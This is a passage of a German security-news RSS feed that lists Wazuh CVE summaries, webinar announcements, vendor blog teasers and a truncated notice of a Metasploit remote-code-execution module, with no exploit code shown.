<description><![CDATA[A vulnerability has been found in Wazuh up to 4.14.2 and classified as critical. This affects an unknown function of the file /src/analysisd/decoders/security_configuration_assessment.c of the component JSON Handler. This manipulation causes stack-based buffer overflow.

This vulnerability appear...]]></description>
<link>https://tsecurity.de/de/3360200/sicherheitsluecken/cve-2026-25790-wazuh-up-to-4142-json-securityconfigurationassessmentc-stack-based-overflow-ghsa-cf24-hq8x-5jx2-wid-sec-2026-0771/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3360200/sicherheitsluecken/cve-2026-25790-wazuh-up-to-4142-json-securityconfigurationassessmentc-stack-based-overflow-ghsa-cf24-hq8x-5jx2-wid-sec-2026-0771/</guid>
<pubDate>Wed, 18 Mar 2026 19:34:48 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.14.2</a> and classified as <a href="https://vuldb.com/?kb.risk">critical</a>. This affects an unknown function of the file <em>/src/analysisd/decoders/security_configuration_assessment.c</em> of the component <em>JSON Handler</em>. This manipulation causes stack-based buffer overflow.

This vulnerability appears as <a href="https://vuldb.com/?source_cve.351404">CVE-2026-25790</a>. The attack may be initiated remotely. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25769 | Wazuh up to 4.14.2 deserialization (GHSA-3gm7-962f-fxw5 / WID-SEC-2026-0771)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Wazuh up to 4.14.2. Affected is an unknown function. The manipulation leads to deserialization.

This vulnerability is listed as CVE-2026-25769. The attack may be initiated remotely. There is no available exploit.

It is suggested to upgr...]]></description>
<link>https://tsecurity.de/de/3360136/sicherheitsluecken/cve-2026-25769-wazuh-up-to-4142-deserialization-ghsa-3gm7-962f-fxw5-wid-sec-2026-0771/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3360136/sicherheitsluecken/cve-2026-25769-wazuh-up-to-4142-deserialization-ghsa-3gm7-962f-fxw5-wid-sec-2026-0771/</guid>
<pubDate>Wed, 18 Mar 2026 19:07:30 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/?kb.risk">problematic</a> has been reported in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.14.2</a>. Affected is an unknown function. The manipulation leads to deserialization.

This vulnerability is listed as <a href="https://vuldb.com/?source_cve.351384">CVE-2026-25769</a>. The attack may be initiated remotely. There is no available exploit.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25770 | Wazuh up to 4.14.2 ossec.conf path traversal (GHSA-r4f7-v3p6-79jm / WID-SEC-2026-0771)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Wazuh up to 4.14.2. This impacts an unknown function of the file /var/ossec/etc/ossec.conf. Executing a manipulation can lead to path traversal.

This vulnerability is tracked as CVE-2026-25770. The attack can be launched remotely. No exploit ...]]></description>
<link>https://tsecurity.de/de/3360135/sicherheitsluecken/cve-2026-25770-wazuh-up-to-4142-ossecconf-path-traversal-ghsa-r4f7-v3p6-79jm-wid-sec-2026-0771/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3360135/sicherheitsluecken/cve-2026-25770-wazuh-up-to-4142-ossecconf-path-traversal-ghsa-r4f7-v3p6-79jm-wid-sec-2026-0771/</guid>
<pubDate>Wed, 18 Mar 2026 19:07:28 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/?kb.risk">critical</a> has been found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.14.2</a>. This impacts an unknown function of the file <em>/var/ossec/etc/ossec.conf</em>. Executing a manipulation can lead to path traversal.

This vulnerability is tracked as <a href="https://vuldb.com/?source_cve.351383">CVE-2026-25770</a>. The attack can be launched remotely. No exploit exists.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] Wazuh: Mehrere Schwachstellen ermöglichen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Wazuh ausnutzen, um Sicherheitsvorkehrungen zu umgehen, Root-Rechte zu erlangen, beliebigen Code mit Root-Rechten auszuführen oder einen Denial-of-Service-Zustand herbeizuführen.]]></description>
<link>https://tsecurity.de/de/3359142/it-security-nachrichten/neu-hoch-wazuh-mehrere-schwachstellen-ermoeglichen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3359142/it-security-nachrichten/neu-hoch-wazuh-mehrere-schwachstellen-ermoeglichen/</guid>
<pubDate>Wed, 18 Mar 2026 13:38:27 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Wazuh ausnutzen, um Sicherheitsvorkehrungen zu umgehen, Root-Rechte zu erlangen, beliebigen Code mit Root-Rechten auszuführen oder einen Denial-of-Service-Zustand herbeizuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Einsteigerwebinar zu Wazuh: Erste Schritte mit dem SIEM ohne Cloudzwang | heise online]]></title>
<description><![CDATA[Wazuh ist ein Tausendsassa – es übernimmt die Funktion eines SIEM (Security Information Event Management, kann aber auch als EDR/XDR (Endpoint/ ...]]></description>
<link>https://tsecurity.de/de/3323955/it-security-nachrichten/einsteigerwebinar-zu-wazuh-erste-schritte-mit-dem-siem-ohne-cloudzwang-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3323955/it-security-nachrichten/einsteigerwebinar-zu-wazuh-erste-schritte-mit-dem-siem-ohne-cloudzwang-heise-online/</guid>
<pubDate>Wed, 04 Mar 2026 00:48:37 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh ist ein Tausendsassa – es übernimmt die Funktion eines SIEM (<b>Security</b> Information Event Management, kann aber auch als EDR/XDR (Endpoint/ ...]]></content:encoded>
</item>
<item>
<title><![CDATA[heise-Angebot: Einsteigerwebinar zu Wazuh: Erste Schritte mit dem SIEM ohne Cloudzwang]]></title>
<description><![CDATA[Wazuh bietet viel und ist Open Source. Unser Einsteigerwebinar zeigt Ihnen die ersten Schritte zum selbst gehosteten SIEM und EDR.]]></description>
<link>https://tsecurity.de/de/3322665/it-nachrichten/heise-angebot-einsteigerwebinar-zu-wazuh-erste-schritte-mit-dem-siem-ohne-cloudzwang/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3322665/it-nachrichten/heise-angebot-einsteigerwebinar-zu-wazuh-erste-schritte-mit-dem-siem-ohne-cloudzwang/</guid>
<pubDate>Tue, 03 Mar 2026 14:31:54 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh bietet viel und ist Open Source. Unser Einsteigerwebinar zeigt Ihnen die ersten Schritte zum selbst gehosteten SIEM und EDR.]]></content:encoded>
</item>
<item>
<title><![CDATA[Proactive strategies for cyber resilience with Wazuh]]></title>
<description><![CDATA[Cyber resilience means anticipating threats, detecting them early, and recovering fast when incidents occur. Wazuh shows how its open source SIEM and XDR unify visibility, detection, and automated response to strengthen proactive defense. [...]]]></description>
<link>https://tsecurity.de/de/3282365/it-security-nachrichten/proactive-strategies-for-cyber-resilience-with-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3282365/it-security-nachrichten/proactive-strategies-for-cyber-resilience-with-wazuh/</guid>
<pubDate>Wed, 11 Feb 2026 18:50:44 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cyber resilience means anticipating threats, detecting them early, and recovering fast when incidents occur. Wazuh shows how its open source SIEM and XDR unify visibility, detection, and automated response to strengthen proactive defense. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[heise-Angebot: Wazuh-Einsteigerwebinar: Frühbucherrabatt endet bald]]></title>
<description><![CDATA[Angriffserkennung, Schwachstellenanalyse und sicheres Logging im Eigenbetrieb - das leistet Wazuh. Unser Webinar macht Sie fit für das vielseitige Werkzeug.]]></description>
<link>https://tsecurity.de/de/3256591/it-nachrichten/heise-angebot-wazuh-einsteigerwebinar-fruehbucherrabatt-endet-bald/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3256591/it-nachrichten/heise-angebot-wazuh-einsteigerwebinar-fruehbucherrabatt-endet-bald/</guid>
<pubDate>Fri, 06 Feb 2026 08:31:55 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Angriffserkennung, Schwachstellenanalyse und sicheres Logging im Eigenbetrieb - das leistet Wazuh. Unser Webinar macht Sie fit für das vielseitige Werkzeug.]]></content:encoded>
</item>
<item>
<title><![CDATA[heise-Angebot: Webinar zu Wazuh: Open-Source SIEM für Angriffserkennung & Analyse]]></title>
<description><![CDATA[Wazuh kann Angriffserkennung, Schwachstellenanalyse und sicheres Logging. Kostenlos und on-premises gehostet ist es obendrein. Unser Webinar zeigt den Einstieg.]]></description>
<link>https://tsecurity.de/de/3214652/it-nachrichten/heise-angebot-webinar-zu-wazuh-open-source-siem-fuer-angriffserkennung-analyse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3214652/it-nachrichten/heise-angebot-webinar-zu-wazuh-open-source-siem-fuer-angriffserkennung-analyse/</guid>
<pubDate>Thu, 15 Jan 2026 12:16:34 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh kann Angriffserkennung, Schwachstellenanalyse und sicheres Logging. Kostenlos und on-premises gehostet ist es obendrein. Unser Webinar zeigt den Einstieg.]]></content:encoded>
</item>
<item>
<title><![CDATA[heise+ | Wazuh: IT-Schutz mit Open Source]]></title>
<description><![CDATA[Die Securityplattform Wazuh integriert SIEM, XDR und Monitoring ohne Lizenzkosten. File Integrity Monitoring überwacht dabei die Integrität von Dateien.]]></description>
<link>https://tsecurity.de/de/3199849/it-nachrichten/heise-wazuh-it-schutz-mit-open-source/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3199849/it-nachrichten/heise-wazuh-it-schutz-mit-open-source/</guid>
<pubDate>Wed, 07 Jan 2026 15:17:19 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Securityplattform Wazuh integriert SIEM, XDR und Monitoring ohne Lizenzkosten. File Integrity Monitoring überwacht dabei die Integrität von Dateien.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nuclei im Test: Open-Source-Tool für Schwachstellenscans in Webanwendungen - Heise]]></title>
<description><![CDATA[Mehr zu IT-Security. Mit freien Werkzeugen auf Malwarepirsch; Das Post-Exploitation-Framework Empire; Wazuh: IT-Schutz mit Open Source · Einfaches ...]]></description>
<link>https://tsecurity.de/de/3173290/it-security-nachrichten/nuclei-im-test-open-source-tool-fuer-schwachstellenscans-in-webanwendungen-heise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3173290/it-security-nachrichten/nuclei-im-test-open-source-tool-fuer-schwachstellenscans-in-webanwendungen-heise/</guid>
<pubDate>Mon, 22 Dec 2025 07:37:03 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mehr zu <b>IT</b>-<b>Security</b>. Mit freien Werkzeugen auf Malwarepirsch; Das Post-Exploitation-Framework Empire; Wazuh: IT-Schutz mit Open Source · Einfaches ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Maintaining enterprise IT hygiene using Wazuh SIEM/XDR]]></title>
<description><![CDATA[Poor IT hygiene, such as unused accounts, outdated software, and risky extensions, creates hidden exposure in your infrastructure. Wazuh, the open-source XDR and SIEM, shows how continuous inventory monitoring across endpoints helps teams spot drift and tighten security. [...]]]></description>
<link>https://tsecurity.de/de/3148612/it-security-nachrichten/maintaining-enterprise-it-hygiene-using-wazuh-siemxdr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3148612/it-security-nachrichten/maintaining-enterprise-it-hygiene-using-wazuh-siemxdr/</guid>
<pubDate>Tue, 09 Dec 2025 18:20:48 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Poor IT hygiene, such as unused accounts, outdated software, and risky extensions, creates hidden exposure in your infrastructure. Wazuh, the open-source XDR and SIEM, shows how continuous inventory monitoring across endpoints helps teams spot drift and tighten security. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Seite 3: Wazuh-Agent und Elastic-Agent ergänzen sich | heise online]]></title>
<description><![CDATA[Nach der Konfiguration der Windows-Integration verteilt der Fleet-Server die Policy an alle registrierten Agenten. Diese laden die aktualisierten ...]]></description>
<link>https://tsecurity.de/de/3138765/windows-server/seite-3-wazuh-agent-und-elastic-agent-ergaenzen-sich-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3138765/windows-server/seite-3-wazuh-agent-und-elastic-agent-ergaenzen-sich-heise-online/</guid>
<pubDate>Thu, 04 Dec 2025 16:01:48 +0100</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nach der Konfiguration der <b>Windows</b>-Integration verteilt der Fleet-<b>Server</b> die Policy an alle registrierten Agenten. Diese laden die aktualisierten ...]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-64169 | Wazuh up to 4.11.x Message fim_alert return value]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Wazuh up to 4.11.x. This impacts the function fim_alert of the component Message Handler. This manipulation causes unchecked return value.

This vulnerability is registered as CVE-2025-64169. Remote exploitation of the attack is possi...]]></description>
<link>https://tsecurity.de/de/3135222/sicherheitsluecken/cve-2025-64169-wazuh-up-to-411x-message-fimalert-return-value/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135222/sicherheitsluecken/cve-2025-64169-wazuh-up-to-411x-message-fimalert-return-value/</guid>
<pubDate>Wed, 03 Dec 2025 08:10:00 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/?kb.risk">problematic</a> has been detected in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.11.x</a>. This impacts the function <code>fim_alert</code> of the component <em>Message Handler</em>. This manipulation causes unchecked return value.

This vulnerability is registered as <a href="https://vuldb.com/?source_cve.333266">CVE-2025-64169</a>. Remote exploitation of the attack is possible. No exploit is available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-54866 | Wazuh up to 4.12.x authd.pass default permission (GHSA-mvfx-ph7m-qm37)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Wazuh up to 4.12.x. Affected by this vulnerability is an unknown functionality of the file C:\Program Files (x86)\ossec-agent\authd.pass. Performing manipulation results in incorrect default permissions.

This vulnerability is reported as CV...]]></description>
<link>https://tsecurity.de/de/3134976/sicherheitsluecken/cve-2025-54866-wazuh-up-to-412x-authdpass-default-permission-ghsa-mvfx-ph7m-qm37/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3134976/sicherheitsluecken/cve-2025-54866-wazuh-up-to-412x-authdpass-default-permission-ghsa-mvfx-ph7m-qm37/</guid>
<pubDate>Wed, 03 Dec 2025 06:51:36 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/?kb.risk">critical</a> has been reported in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.12.x</a>. Affected by this vulnerability is an unknown functionality of the file <em>C:\Program Files (x86)\ossec-agent\authd.pass</em>. Performing manipulation results in incorrect default permissions.

This vulnerability is reported as <a href="https://vuldb.com/?source_cve.333268">CVE-2025-54866</a>. The attack requires a local approach. No exploit exists.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[IT-Sicherheit: Windows härten mit Microsoft-Tools | heise online]]></title>
<description><![CDATA[Orientierungshilfen und Benchmarks gibt es genug, zur Umsetzung reichen oft schon Bordmittel. Mehr zu IT-Security. Wazuh: IT-Schutz mit Open Source ...]]></description>
<link>https://tsecurity.de/de/3123045/it-security-nachrichten/it-sicherheit-windows-haerten-mit-microsoft-tools-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3123045/it-security-nachrichten/it-sicherheit-windows-haerten-mit-microsoft-tools-heise-online/</guid>
<pubDate>Thu, 27 Nov 2025 06:36:10 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Orientierungshilfen und Benchmarks gibt es genug, zur Umsetzung reichen oft schon Bordmittel. Mehr zu <b>IT</b>-<b>Security</b>. Wazuh: IT-Schutz mit Open Source ...]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-30201 | Wazuh up to 4.12.x UNC Path file inclusion (GHSA-x697-jf34-gp5x / EUVD-2025-198509)]]></title>
<description><![CDATA[A vulnerability has been found in Wazuh up to 4.12.x and classified as problematic. This vulnerability affects unknown code of the component UNC Path Handler. This manipulation causes file inclusion.

The identification of this vulnerability is CVE-2025-30201. It is possible to initiate the attac...]]></description>
<link>https://tsecurity.de/de/3113728/sicherheitsluecken/cve-2025-30201-wazuh-up-to-412x-unc-path-file-inclusion-ghsa-x697-jf34-gp5x-euvd-2025-198509/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3113728/sicherheitsluecken/cve-2025-30201-wazuh-up-to-412x-unc-path-file-inclusion-ghsa-x697-jf34-gp5x-euvd-2025-198509/</guid>
<pubDate>Sat, 22 Nov 2025 09:51:50 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.12.x</a> and classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This vulnerability affects unknown code of the component <em>UNC Path Handler</em>. This manipulation causes file inclusion.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.333260">CVE-2025-30201</a>. It is possible to initiate the attack remotely. There is no exploit available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[Open-Source-SOC-Architektur mit Wazuh - Informatik Aktuell]]></title>
<description><![CDATA[Ein zentrales Element jeder modernen Sicherheitsstrategie ist das frühzeitige Erkennen und Beheben von Schwachstellen in IT-Systemen. Je früher ...]]></description>
<link>https://tsecurity.de/de/3095586/it-security-nachrichten/open-source-soc-architektur-mit-wazuh-informatik-aktuell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3095586/it-security-nachrichten/open-source-soc-architektur-mit-wazuh-informatik-aktuell/</guid>
<pubDate>Thu, 13 Nov 2025 11:34:45 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein zentrales Element jeder modernen Sicherheitsstrategie ist das frühzeitige Erkennen und Beheben von Schwachstellen in <b>IT</b>-Systemen. Je früher ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware Defense Using the Wazuh Open Source Platform]]></title>
<description><![CDATA[Ransomware is malicious software designed to block access to a computer system or encrypt data until a ransom is paid. This cyberattack is one of the most prevalent and damaging threats in the digital landscape, affecting individuals, businesses, and critical infrastructure worldwide.
A ransomwar...]]></description>
<link>https://tsecurity.de/de/3079081/it-security-nachrichten/ransomware-defense-using-the-wazuh-open-source-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3079081/it-security-nachrichten/ransomware-defense-using-the-wazuh-open-source-platform/</guid>
<pubDate>Tue, 04 Nov 2025 13:05:38 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ransomware is malicious software designed to block access to a computer system or encrypt data until a ransom is paid. This cyberattack is one of the most prevalent and damaging threats in the digital landscape, affecting individuals, businesses, and critical infrastructure worldwide.
A ransomware attack typically begins when the malware infiltrates a system through various vectors such as]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh: Open-Source SIEM für Angriffserkennung & Analyse | heise online]]></title>
<description><![CDATA[... Sicherheitsinformationen zentralisieren wollen und deshalb über die Anschaffung eines SIEMs (Security Information and Event Management) nachdenken.]]></description>
<link>https://tsecurity.de/de/3071189/it-security-nachrichten/wazuh-open-source-siem-fuer-angriffserkennung-analyse-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3071189/it-security-nachrichten/wazuh-open-source-siem-fuer-angriffserkennung-analyse-heise-online/</guid>
<pubDate>Thu, 30 Oct 2025 16:35:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... Sicherheitsinformationen zentralisieren wollen und deshalb über die Anschaffung eines SIEMs (<b>Security</b> Information and Event Management) nachdenken.]]></content:encoded>
</item>
<item>
<title><![CDATA[heise-Angebot: heise security Webinar: Einführung in das Opensource-SIEM Wazuh]]></title>
<description><![CDATA[Angriffserkennung, Schwachstellenanalyse und sicheres Logging - all das beherrscht Wazuh. Kostenlos und on-premises gehostet ist es obendrein.]]></description>
<link>https://tsecurity.de/de/3070413/it-nachrichten/heise-angebot-heise-security-webinar-einfuehrung-in-das-opensource-siem-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3070413/it-nachrichten/heise-angebot-heise-security-webinar-einfuehrung-in-das-opensource-siem-wazuh/</guid>
<pubDate>Thu, 30 Oct 2025 10:16:00 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Angriffserkennung, Schwachstellenanalyse und sicheres Logging - all das beherrscht Wazuh. Kostenlos und on-premises gehostet ist es obendrein.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-34294 | Wazuh File Integrity Monitoring toctou]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Wazuh File Integrity Monitoring. Affected is an unknown function. The manipulation results in time-of-check time-of-use.

This vulnerability was named CVE-2025-34294. The attack needs to be approached locally. There is no availabl...]]></description>
<link>https://tsecurity.de/de/3069767/sicherheitsluecken/cve-2025-34294-wazuh-file-integrity-monitoring-toctou/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3069767/sicherheitsluecken/cve-2025-34294-wazuh-file-integrity-monitoring-toctou/</guid>
<pubDate>Thu, 30 Oct 2025 01:05:33 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, was found in <a href="https://vuldb.com/?product.wazuh:file_integrity_monitoring">Wazuh File Integrity Monitoring</a>. Affected is an unknown function. The manipulation results in time-of-check time-of-use.

This vulnerability was named <a href="https://vuldb.com/?source_cve.330319">CVE-2025-34294</a>. The attack needs to be approached locally. There is no available exploit.

It is best practice to apply a patch to resolve this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[heise security Webinar: Einführung in das Opensource-SIEM Wazuh]]></title>
<description><![CDATA[... (Security Information and Event Management) nachdenken, um sicherheitsrelevante Protokolle rasch analysieren zu können. Da empfiehlt sich ein Blick ...]]></description>
<link>https://tsecurity.de/de/3023426/it-security-nachrichten/heise-security-webinar-einfuehrung-in-das-opensource-siem-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3023426/it-security-nachrichten/heise-security-webinar-einfuehrung-in-das-opensource-siem-wazuh/</guid>
<pubDate>Mon, 06 Oct 2025 15:05:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... (<b>Security</b> Information and Event Management) nachdenken, um sicherheitsrelevante Protokolle rasch analysieren zu können. Da empfiehlt sich ein Blick ...]]></content:encoded>
</item>
<item>
<title><![CDATA[heise-Angebot: heise security Webinar: Einführung in das Opensource-SIEM Wazuh]]></title>
<description><![CDATA[Angriffserkennung, Schwachstellenanalyse und sicheres Logging - all das beherrscht Wazuh. Kostenlos und on-premises gehostet ist es obendrein.]]></description>
<link>https://tsecurity.de/de/3023061/it-nachrichten/heise-angebot-heise-security-webinar-einfuehrung-in-das-opensource-siem-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3023061/it-nachrichten/heise-angebot-heise-security-webinar-einfuehrung-in-das-opensource-siem-wazuh/</guid>
<pubDate>Mon, 06 Oct 2025 12:16:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Angriffserkennung, Schwachstellenanalyse und sicheres Logging - all das beherrscht Wazuh. Kostenlos und on-premises gehostet ist es obendrein.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-59938 | Wazuh up to 4.10.x EventChannel Message heap-based overflow (GHSA-vw3r-mjg3-9hh2 / EUVD-2025-31396)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Wazuh up to 4.10.x. Affected is an unknown function of the component EventChannel Message Handler. The manipulation results in heap-based buffer overflow.

This vulnerability is known as CVE-2025-59938. It is possible to launch the a...]]></description>
<link>https://tsecurity.de/de/3007973/sicherheitsluecken/cve-2025-59938-wazuh-up-to-410x-eventchannel-message-heap-based-overflow-ghsa-vw3r-mjg3-9hh2-euvd-2025-31396/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3007973/sicherheitsluecken/cve-2025-59938-wazuh-up-to-410x-eventchannel-message-heap-based-overflow-ghsa-vw3r-mjg3-9hh2-euvd-2025-31396/</guid>
<pubDate>Sat, 27 Sep 2025 18:50:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.10.x</a>. Affected is an unknown function of the component <em>EventChannel Message Handler</em>. The manipulation results in heap-based buffer overflow.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.326161">CVE-2025-59938</a>. It is possible to launch the attack remotely. No exploit is available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Defending against malware persistence techniques with Wazuh]]></title>
<description><![CDATA[Malware persistence keeps attackers in your systems long after reboots or resets. Wazuh helps detect and block hidden techniques like scheduled tasks, startup scripts, and modified system files—before they turn into long-term compromise. [...]]]></description>
<link>https://tsecurity.de/de/2956826/it-security-nachrichten/defending-against-malware-persistence-techniques-with-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2956826/it-security-nachrichten/defending-against-malware-persistence-techniques-with-wazuh/</guid>
<pubDate>Mon, 25 Aug 2025 16:34:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Malware persistence keeps attackers in your systems long after reboots or resets. Wazuh helps detect and block hidden techniques like scheduled tasks, startup scripts, and modified system files—before they turn into long-term compromise. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh for Regulatory Compliance]]></title>
<description><![CDATA[Organizations handling various forms of sensitive data or personally identifiable information (PII) require adherence to regulatory compliance standards and frameworks. These compliance standards also apply to organizations operating in regulated sectors such as healthcare, finance, government co...]]></description>
<link>https://tsecurity.de/de/2945241/it-security-nachrichten/wazuh-for-regulatory-compliance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2945241/it-security-nachrichten/wazuh-for-regulatory-compliance/</guid>
<pubDate>Mon, 18 Aug 2025 12:48:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Organizations handling various forms of sensitive data or personally identifiable information (PII) require adherence to regulatory compliance standards and frameworks. These compliance standards also apply to organizations operating in regulated sectors such as healthcare, finance, government contracting, or education. Some of these standards and frameworks include, but are not limited to:]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh Server Remote Code Execution]]></title>
<description><![CDATA[Topic: Wazuh Server Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2938534/sicherheitsluecken/wazuh-server-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2938534/sicherheitsluecken/wazuh-server-remote-code-execution/</guid>
<pubDate>Thu, 14 Aug 2025 00:06:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Wazuh Server Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[triggering CACAOv2 playbooks via Swagger UI in a SOARCA environment]]></title>
